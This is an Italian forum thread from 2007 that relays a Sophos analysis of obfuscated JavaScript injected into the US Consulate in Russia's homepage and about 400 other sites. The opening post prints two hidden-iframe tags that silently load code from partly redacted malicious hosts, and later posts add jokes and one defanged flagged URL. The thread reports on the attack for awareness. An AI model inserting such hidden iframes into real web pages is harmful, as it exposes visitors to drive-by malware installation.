PDA

View Full Version : Un grande pesce preso nella rete - ancora Gromozon


xcdegasp
14-09-2007, 13:53
Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia.

Analizzando il codice sorgente si può notare los cript offuscato e criptato:

http://img213.imageshack.us/img213/4494/cons1bg7.th.gif (http://img213.imageshack.us/my.php?image=cons1bg7.gif)


lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima:

<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe>


Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione:

http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2_sm.gif (http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2.gif)


1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg.

2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo.

3. Ogni vettore fa installare un trojan.


La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo:

<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe>


L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico".



Fonte: sophos.com (http://www.sophos.com/security/blog/2007/09/580.html)

c.m.g
14-09-2007, 17:52
mi chiedo quando saranno fermati! :mad:

pistolino
14-09-2007, 18:04
Subito dopo aver letto il titolo "Un grande pesce preso nella rete", ho chiamato il super-eroe che debellerà il male rappresentato da Gromozon:

http://www.parcogolenadelpo.it/Animali%20colora/pesce.gif
Si salvi chi può. :ops:

Regards

BEY0ND
14-09-2007, 18:17
mica l'avrà catturato lui???:mbe:
http://img299.imageshack.us/img299/2488/sampeijx8.th.jpg (http://img299.imageshack.us/my.php?image=sampeijx8.jpg)

c.m.g
14-09-2007, 19:16
finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum :D :ciapet:

ovviamente si scherza! ;)

sampei.nihira
14-09-2007, 19:24
finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum :D :ciapet:

ovviamente si scherza! ;)

:D :D :D

c.m.g
15-09-2007, 08:08
:D :D :D

;)

xcdegasp
17-09-2007, 10:46
e giusto poco fa' ecco che mi è successo:
Requested URL: hxxp://geniv.forumcommunity.net/?t=6226730
Information: Contains suspicious code HEUR/Exploit.HTML

pure forumcommunity.net stanno infettando?

lancetta
17-09-2007, 11:19
e giusto poco fa' ecco che mi è successo:


pure forumcommunity.net stanno infettando?

e sì....:rolleyes: la recrudescenza verso l'italia sta raggiungendo un nuovo picco

xcdegasp
17-09-2007, 11:56
non vedo l'ora di vederli alla gogna sti .... :muro: